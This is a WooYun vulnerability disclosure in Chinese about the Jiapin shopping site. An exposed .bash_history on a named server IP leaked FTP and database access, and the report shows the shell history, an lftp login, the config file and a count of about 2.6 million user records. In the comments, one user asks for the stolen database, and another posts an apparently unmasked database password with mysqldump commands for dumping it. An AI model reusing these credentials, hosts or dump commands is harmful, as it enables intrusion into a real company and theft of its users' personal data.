当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046857

漏洞标题:佳品网敏感信息泄露导致服务器沦陷(可影响数百万用户信息)

相关厂商:佳品网

漏洞作者: 猪猪侠

提交时间:2013-12-23 23:49

修复时间:2013-12-28 23:49

公开时间:2013-12-28 23:49

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

由于没有一个通用标准的防御规则保护好中间件配置信息、DNS信息、业务数据信息、用户信息、源码备份文件、版本管理工具信息、系统错误信息和敏感地址信息(后台或测试地址)的泄露,攻击者可能会通过收集这些保护不足的数据,利用这些信息对系统实施进一步的攻击。

详细说明:

#1 信息泄露原因
由于佳品网管理员在设置HTTPD中间件管理用户的主目录时,未注意到bash会默认创建各种.bash_history、.bash_profile文件用来生成对应的SHELL环境,从而造成了更严重的信息安全问题。
#2 泄露内容
网站: http://119.254.82.134
泄露文件:http://119.254.82.134/.bash_history
#3 泄露内容

chmod -R 777 index.php
cat index.php
cat index.php| error
cat index.php|grep error
vi index.php.3
vim bootstrap.php
exit
cd vipstore.com2/
cd html/
cat index.php| grep error
cat index.php| grep try
vi index.php
vi index.php.3
vi index.php
vi index.php
exit
cd goods/
cd html/
vi ../../vipstore.com2/html/bootstrap.php
vi ../../vipstore.com2/html/bootstrap.php
cd goods/
cd html/
cd config/
vi config.ini
cd ht
/html/
cd goods/
cd html/
cd vipstore.com2/
cd html/
cat bootstrap.php
cd www/
cd goods/
cd html/
cd -
pwd
cd vipstore.com2/
cd html/
cd goods/
cd config/
vi config.ini
cd ht
vi ../html/bootstrap.php
exit
cd vipstore.com2/
cd application/admin/
cd controllers/
vi KilqlController.php
exit
cd vipstore.com2/
cd application/user/
cd admin/
cd controllers/
vi KilqlController.php
su ftpuser
su ftpuser
cd vipstore.com2/application/admin/controllers/
vimdiff KilqlController.php KilqlController.php.bak
cd mode/
vi KilqlModel.php KilqlModel.php
cd -
cd controllers/
vi KilqlController.php
vi KilqlController.php
/mode/
vi KilqlModel.php
vi KilqlModel.php
cd -
vi KilqlController.php
vi KilqlController.php
vi KilqlController.php
exit
cd fleet_upload/
cd task/
vim mv_project_file_to_online_path.sh
ll
cd f_1337761972/
ll
ll
ll f*/
cd task/
ks
rm f_1337* -rf
cd task/
cd fleet_upload/task/
vi mv_project_file_to_online_path.sh
exit
cd fleet_upload/
cd task/
cd f_1337826*
pwd
ll
cdcd fleet_upload/
cd fleet_upload/
ll
chmod -R 777
chmod -R 777 ./
chmod -R 777 ../
/
chmod -R 777 fleet_upload/
cd fleet_upload/
cd f_1337826921/
lftp -u www,^*******7*UHB ffttpp.vipstore.com
exit
cd fleet_upload/
rm f_13378* -rf
cd task/
cd vipstore.com2/
rm -rf procedure/order
cd -
cd www/
cd fleet_upload/
cd task/
cd task/
cd f_1337841923/
/../vipstore.com2/procedure/
cd -
rm f_1337841923/ -rf
ks
watch -n 0.1 "ll"
watch -n 0.1 " ./"
watch -n 0.1 "find ./ *"
vi task/mv_project_file_to_online_path.sh
cd task/
cat task.sh
cat task.sh
cat task.sh
*
cd task/
cd f_1337842643/task/
watch -n 0.1 ""
pwd
rm f_1337842* -rf
watch -n 0.1 ""
l
s
rm f_1337842858/ -rf
cd task/
cat task.sh
cat task.sh
exit
cd vipstore.com2/
cd fleet_upload/
cd task/
cat task.sh
cd f_1337855455/
cd task/
rm -rf task/
cd task/
cat task.sh
cd f_1337856806/
cd task/
rm 1337856* -rf
vi mv_project_file_to_online_path.sh
rm f_133785* -rf
watch -n 0.1 ""
cd /www/vipstore.com2/procedure/order/
cd vipstore.com2/
cd application/
cd m
cd controllers/
mv Iphonemember

漏洞证明:

#4 漏洞利用
泄露的信息中包含了某服务器的SSH用户名、密码,可远程连接

lftp -u www,^*******7*UHB ffttpp.vipstore.com


jiapin_ftp.jpg


jiapin_shell.jpg


#5 查看数据库配置文件,并连接数据库
cat /vipstore.com/config/config.ini

[default]
; 站点设置
www.host = localhost
www.baseurl = /
; xml数据文件
data.file = data/departments.xml
menu.file = data/menu.xml
; 数据连接设置
db.adapter = PDO_MYSQL
db.dbname = vipstore2
db.hostname = 10.0.111.195
db.username = root
db.password = 6yh****7
db.profiler = true
; Debug 模式
debug = on
config = on
;cache 设置
cache.lifetime = 72000
cache.automatic_Serialization = true
;session 设置
session.remember_me_seconds = 86400000 //10天会话标识符还将保存在cookie中的时长
session.use_only_cookies = on
;admin_log 管理员日志
log.addgroup = 添加角色
log.editgroup = 编辑角色:
log.menu = 添加菜单
log.editmenu = 编辑菜单:
log.user = 添加管理员
log.edituser = 编辑用户:
log.addcredit = 添加积分规则:
log.editcredit = 编辑积分规则:
log.additem = 添加标签项:
log.addtag = 添加标签:
log.edititem = 编辑标签项:
log.edittag = 编辑标签:
log.detaidel = 删除最终标签
log.addvir = 添加虚拟账户获取规则:
log.editvir = 编辑虚拟账户获取规则:


#6 访问到敏感的用户数据

SELECT COUNT(*) FROM `user_member`
2639889


jiapin_mermber.jpg

修复方案:

#1 网络边界需要认真对待
#2 杜绝为了方便而造成的不必要的信息泄露
#3 安全是一个整体,保证安全不在于强大的地方有多强大,而在于真正薄弱的地方在哪里

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-28 23:49

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-23 23:55 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    要不要这么淫荡啊

  2. 2013-12-24 00:13 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @小胖子 R啊。。。。。。

  3. 2013-12-24 09:19 | flywin ( 路人 | Rank:9 漏洞数:1 | 有好的安卓或者IOS远程控制的请联系我,RMB...)

    有裤子发给我一份

  4. 2013-12-25 19:29 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    无影响,厂商忽略!

  5. 2013-12-29 13:28 | insight-labs 认证白帽子 ( 普通白帽子 | Rank:623 漏洞数:75 | Security guys)

    mysql -uslave -p6yhnmju7 -h 10.0.111.194historylllocate 2.sqlcd /www/help/llll -hsllpwdmysqldump -u www -p vipstore2 -h 10.0.111.195 > 2.sqlmysqldump -u slave -p 6yhnmju7 -h 10.0.111.194 > 2.sqlmysqldump -uslave -p6yhnmju7 -h 10.0.111.194 > 2.sqlmysqldump -uslave -p6yhnmju7 -h 10.0.111.194 vipstore2> 2.sqlmysql -uslave -p6yhnmju7 -h 10.0.111.194目测已被数人拖过……

  6. 2013-12-29 23:32 | txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)

    姿势够淫荡的啊

  7. 2013-12-30 00:15 | n3wF ( 路人 | Rank:6 漏洞数:2 )

    "由于佳品网管理员在设置HTTPD中间件管理用户的主目录时",这个是不是就是说把站点目录设置成了用户目录,或者说把虚拟目录设置成了用户目录就会造成这种泄漏?

  8. 2013-12-30 09:47 | feng ( 普通白帽子 | Rank:664 漏洞数:79 | 想刷个6D)

    猪哥总是给人惊喜